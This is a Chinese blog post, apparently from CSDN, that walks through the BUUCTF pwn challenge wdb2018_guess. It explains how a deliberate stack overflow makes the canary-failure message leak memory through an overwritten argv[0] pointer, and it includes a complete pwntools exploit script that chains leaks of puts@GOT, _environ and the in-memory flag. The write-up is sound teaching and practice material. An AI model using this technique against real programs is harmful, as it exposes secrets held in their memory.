wdb2018_guess与stack smash

最新推荐文章于 2024-03-30 23:08:20 发布
最新推荐文章于 2024-03-30 23:08:20 发布
阅读量161 收藏
点赞数
分类专栏: buuctf 文章标签: linux python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/vage__table/article/details/129029532
版权

前言

巩固一下stack smash技术,了解elf程序的运行环境参数

题目分析与exp

wdb2018_guess这题因为只有不限制长度的输入,但是程序没有正常的输出返回信息。因此需要利用stack samsh来泄露我们需要的信息。

题目分析

check下程序
在这里插入图片描述
简单的分析一下题目。先是读取了flag到内存中,然后程序会循环三次进行判断,三次之后程序会自动退出。
在这里插入图片描述
如果没有超过三次,那么每一次都会fork一个相同的子进程,子进程的信息和父进程的一致。
在这里插入图片描述
因为有fork子进程的操作在这里,第一个感觉是通过爆破比对来获得flag,但是限制三次的次数有点不对劲QAQ。因此转换思路,利用canary的保护来输出信息,拿到内存中读取的flag。

exp

有了思路之后,利用stack smash拿到flag就很轻松了,具体debug的动态调试就不放的,可以参考其他师傅的链接。

from pwn import *
from LibcSearcher import *
from sys import *
from time import *
context(os="linux",arch = "amd64",log_level = "debug",terminal = ['gnome-terminal', '-x', 'sh', '-c'])
#++++++++++++++++++++++++++++++++++++++++
filename = sys.argv[1]
choice = sys.argv[2]
if choice == "1":
	port = sys.argv[3]
	p = remote("node4.buuoj.cn",port)
else:
	p = process(filename)
elf = ELF(filename)
#++++++++++++++++++++++++++++++++++++++++
r = lambda length: p.recv(length)
ru = lambda x : p.recvuntil(x)
s = lambda x : p.send(x)
sa = lambda delim,x : p.sendafter(delim,x)
sl = lambda x : p.sendline(x)
sla = lambda delim,x : p.sendlineafter(delim,x)
itr = lambda : p.interactive()
leak = lambda addr : log.success("{:x}".format(addr))
def debug():
	gdb.attach(p,"b *0x400b23")
	pause()
#++++++++++++++++++++++++++++++++++++++++
local32 = "/lib/i386-linux-gnu/libc.so.6"
local64 = "/lib/x86_64-linux-gnu/libc.so.6"
remote32 = "/home/chenyy/Desktop/223/ubuntu32/libc-2.23.so"
remote64 = "/home/chenyy/Desktop/223/ubuntu64/libc-2.23.so"
def find_libc(function,function_address,path=""):
	global libc_base,libc
	log.info("{0} addr is 0x{1:x}".format(function,function_address))
	# print(type(function))==>str
	if path == "":
		libc = LibcSearcher(function,function_address)
		libc_base = function_address - libc.dump(function)
		system = libc_base + libc.dump("system") 
		binsh = libc_base + libc.dump("/bin/sh")
	else:
		libc = ELF(path)
		libc_base = function_address - libc.sym[function]
		system = libc_base + libc.sym["system"]
		binsh = libc_base + libc.search("/bin/sh").next()
	log.success("libc_base addr is 0x{:x}".format(libc_base))
	leak(system)
	leak(binsh)
	return (system,binsh)
#++++++++++++++++++++++++++++++++++++++++
fake_rbp = "deadbeef"
fake_ebp = "dead"

payload = flat({
	0x48:["a" * 0xe0,puts_got]
	},filler = "\x00")
ru("Please type your guessing flag\n")
sl(flat(payload))
ru("*** stack smashing detected ***: ")
puts_addr = u64(ru("\x7f")[-6:].ljust(8,"\x00"))
system,binsh = find_libc("puts",puts_addr,path = remote64)
environ = libc_base + libc.sym["_environ"]
leak(environ)
payload2 = flat({
	0x48:["a" * 0xe0,environ]
	})
ru("Please type your guessing flag\n")
sl(flat(payload2))
distance = 0x7ffed0eb0cb8 - 0x7ffed0eb0b50
ru("*** stack smashing detected ***: ")
environ_table = u64(ru("\x7f")[-6:].ljust(8,"\x00"))
leak(environ_table)
payload3 = flat({
	0x48:["a" * 0xe0,environ_table - distance]
	})
sl(payload3)
itr()

stack smash

我们可以从源码来看stack smash利用的原理。
首先是canary会调用的stack_check_fail函数

#include <stdio.h>
#include <stdlib.h>
extern char **__libc_argv attribute_hidden;
void
__attribute__ ((noreturn))
__stack_chk_fail (void)
{
  __fortify_fail ("stack smashing detected");
}

然后是调用了__fortify_fail函数

#include <stdio.h>
#include <stdlib.h>
extern char **__libc_argv attribute_hidden;
void
__attribute__ ((noreturn)) internal_function
__fortify_fail (const char *msg)
{
  /* The loop is added only to keep gcc happy.  */
  while (1)
    __libc_message (2, "*** %s ***: %s terminated\n",
		    msg, __libc_argv[0] ?: "<unknown>");  //会输出__libc_argv[0]处的的字符串,本来这个位置存放的都是程序的名称
}
libc_hidden_def (__fortify_fail)

这个__libc_argv参数会是通过存储在栈上的一张表来进行维护的,程序的environ指针会指向这一张表的地址。这张表的内容可以在进程下的environ文件看到
在这里插入图片描述
debug中可以看到environ指针的类型,_environ和environ是同一个指针,通过ida查看libc可以得知这一点。
在这里插入图片描述
可以看到,environ指向的是一张指针表,里面每一个指针都指向一个参数字符串,也就是上面的environ文件了。
在这里插入图片描述

Tw0_Y
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
wdb_scraper
03-22
【标题】"wdb_scraper" 是一个针对Tutti.ch网站的数据抓取工具,它设计用于从该网站上高效地收集和整理信息。Tutti.ch是一个瑞士的在线市场,用户可以在这里查找各种服务、商品和活动。wdb_scraper帮助数据分析师、...
wdb_graphql
03-15
迷你挑战3-WDB @ FHNE BSc数据科学 作者:卢卡斯·雷伯(Lukas Reber) 使用Django和Graphene构建的GraphQL API。 Selenium Web Scraping脚本(在找到)使用该API来存储和更新数据库中的数据。 由于这只是概念的...
wdb2018_guess
z1r0的博客
01-19 1005
wdb2018_guess 查看保护 这里开了canary,溢出时会报错 可以看到报错后面会输出程序名字,既然flag被放到了栈上是不是也可以被输出。 environ是libc中存储栈地址的一个变量,可以通过environ算出与flag的偏移,再将flag通过canary来输出。 想要知道environ的地址还需要知道libc的地址,libc的地址可以通过got来算。 那么第一步就是需要算出argv[0]与gets这个地方ebp-0x40的偏移。 argv[0]的地址为0x7fffffffdeb8,
BUUCYF之“wdb2018_guess
Probeginner的博客
12-18 306
stack smash的使用
wdb2018_guess fork()和wait()的问题
carol2358的博客
09-02 375
这个问题困扰了我,程序动脑不如动手,就写了一个程序来判断,问题的来源是wdb2018_guess 这道题 他fork()了三次,却只有3次gets(),我想着明明有4个进程,为什么只gets了3次 #include<stdio.h> #include <sys/types.h> #include <unistd.h> #include<sys/wait.h> int main() { int stat_loc; int i=0; int n=3; in
[BUUCTF]wdb2018_guess——Stack smash技巧
zyxx_wjc的博客
07-20 411
stack smash
[BUUCTF-pwn]——wdb2018_guess (environ环境变量)
Y_peak的博客
04-06 1330
[BUUCTF-pwn]——wdb2018_guess 这个漏洞叫什么来着, 好像是stack smash, 具体就是主动触发canary保护来达到自己的目的. 这道题最后我也有一个小疑问, 这个程序为什么会莫名其妙执行三次. 嘶!!! 一个常见的保护开启NX canary RELRO 在IDA中看看, 那个buf就是我们要的flag 先主动触发一下canary看看会发送什么. 输出的是argv[0], 同时程序会再次执行,发现会重复执行三次. 思路 思路来了 利用主动触发canary保护, 调用**
WDB.zip_vxworks WDB组件_vxworks wdb_wdb
09-22
在《WDB.doc》文档中,可能会详细阐述如何配置VxWorks系统以包含WDB组件,如何建立主机与目标设备的连接,以及如何使用WDB提供的调试工具来有效地解决调试过程中的问题。通过阅读和理解这份文档,开发者将能够更深入...
ORMON_FINS.rar_LABVIEW fins_LABVIEW 协议_LABVIEW与omron_OMRON plc通
07-15
《LABVIEW与OMRON PLC通过FINS协议进行通信详解》 在工业自动化领域,编程语言LABVIEW(Laboratory Virtual Instrument Engineering Workbench)以其强大的图形化编程能力被广泛应用。特别是当需要与不同品牌的PLC...
WDB论坛阿宝修改加美化 v2.0 正式版.zip
06-19
【描述】"WDB论坛阿宝修改加美化 v2.0 正式版.zip" 的描述简洁明了,主要强调了这个版本是由阿宝进行的修改和美化,而且是版本号为2.0的正式版,暗示与之前的版本相比可能包含了更多功能改进和视觉优化。 【标签】...
wdb2018_guess-___stack_chk_fail泄露信息
qq_40712959的博客
11-03 376
背景知识 在程序添加了canary保护后,如果我们读取的bof覆盖了对应的值时,程序就会报错,我们可以利用报错信息。 程序在启动canary保护之后,如果发现canary被修改的话,程序就会执行__stack_chk_fail函数来打印argv[0]指针所指向的字符串,正常情况下,这个指针指向程序名。很简单,只要我们可以控制argv[0],就能知道我们想知道的信息。 void __attribute__ ((noreturn)) __stack_chk_fail (void) { __forti
[BUUCTF]PWN——wdb2018_guessstack smashing--canary报错利用)
mcmuyanga的博客
03-14 1171
wdb2018_guess 例行检查,64位程序,开启了canary和nx 本地试运行一下,看看大概的情况 64位ida载入 存在溢出利用点,但是有canary保护,这边39行和41行的puts函数是写死的,没法用来接收泄露的信息,想到了利用canary的报错输出 在程序加了 carry 保护后,如果我们的输入覆盖了 carry ,程序就会报错,报错代码如下,可以看到,程序会执行 __stack_chk_fail 函数来打印 __libc_argv[0] 指针所指向的字符串(默认存储的是程序的名称)
[BUUTF]-PWN:wdb2018_guess解析(修改argv0)
2301_79326813的博客
02-09 325
查看保护查看ida这道题并不复杂,只是要注意一点细节。
wdb2018 guess 之 environ的利用
最新发布
qq_60209620的博客
03-30 300
通过libc找到environ地址后,泄露environ地址处的值,可以得到环境变量地址,环境变量保存在栈中,通过偏移可以得到栈上任意变量的地址。这个函数会打印__libc_argv[0],其实就是文件路径,我们只用找到__libc_argv[0]在哪,看文件地址。所以偏移值:0x7ffd2d95e6c8 - 0x7ffd2d95e560 = 0x168。
网鼎杯2018 guess(stack smashing)
seaaseesa的博客
04-30 921
wdb2018_guess stack smashing 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 Flag读取并存储在栈里 Fork三次子进程,然后有gets函数,导致栈溢出,但是有canary保护。 由于使用了gets,因此可以无限制溢出,并且有三次机会。那么,我们可以利用stack smashing报错,来输出信息。第一次,我们泄露函数的got表内容,为...
sql注入(二)盲注,二次注入,宽字节注入
m0_63306943的博客
04-30 1275
盲注和二次注入介绍及实例
SQL注入进阶练习(一)一些进阶的注入方法
好好睡觉
03-10 2439
二次注入、宽字节注入、order by注入、limit 注入
wdb_2018_1st_babyheap
z1r0的博客
03-24 529
wdb_2018_1st_babyheap 查看保护 一个uaf漏洞这个程序内申请的堆块大小是固定的0x20。edit有限制 攻击思路:这里有两种攻击方法,一种是unlink,因为pie没开。还有一种是FSOP。 这里笔者unlink打不通,然后就采取了FSOP 首先肯定是泄露libc。因为FSOP需要_IO_list_all这个地方。 泄露libc一般是unstortedbin来泄露,所以这里想办法给出一个0x90以上的堆块 因为有uaf,再加上2.23下的libc.so,所以可以先泄露出heap_a
[BUUCTF-pwn] wdb_2018_semifinal_pwn2
weixin_52640415的博客
01-07 147
又是一个虚拟机的题,干到一半想放弃了,搜不到wp又回来慢慢作。 先看题目: for ( byte_6024C1 = 0; ; ++byte_6024C1 ) { byte_6028E1 = byte_6024E0[byte_6024C1]; if ( !byte_6028E1 ) break; byte_6028E0 = 0; if ( byte_6028E1 == 62 ) // > 先后移指针
怎么把vivao2018.2波形生成的WDB文件导出来
03-29
要将Vivado 2018.2波形生成的WDB文件导出,请按照以下步骤进行操作: 1. 在Vivado中打开波形文件。 2. 点击“File”菜单并选择“Write Waveform Data”。 3. 在弹出的“Write Waveform Data File”对话框中,选择要导出的波形文件并指定输出文件路径和文件名。 4. 点击“OK”按钮,Vivado将导出WDB文件到指定的输出路径中。 5. 您可以使用其他工具打开WDB文件,例如Xilinx的ChipScope Pro或Aldec的Active-HDL。 注意:在导出WDB文件时,您可能需要指定正确的波形信息,例如时钟频率和时钟相位,以确保正确地还原波形。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值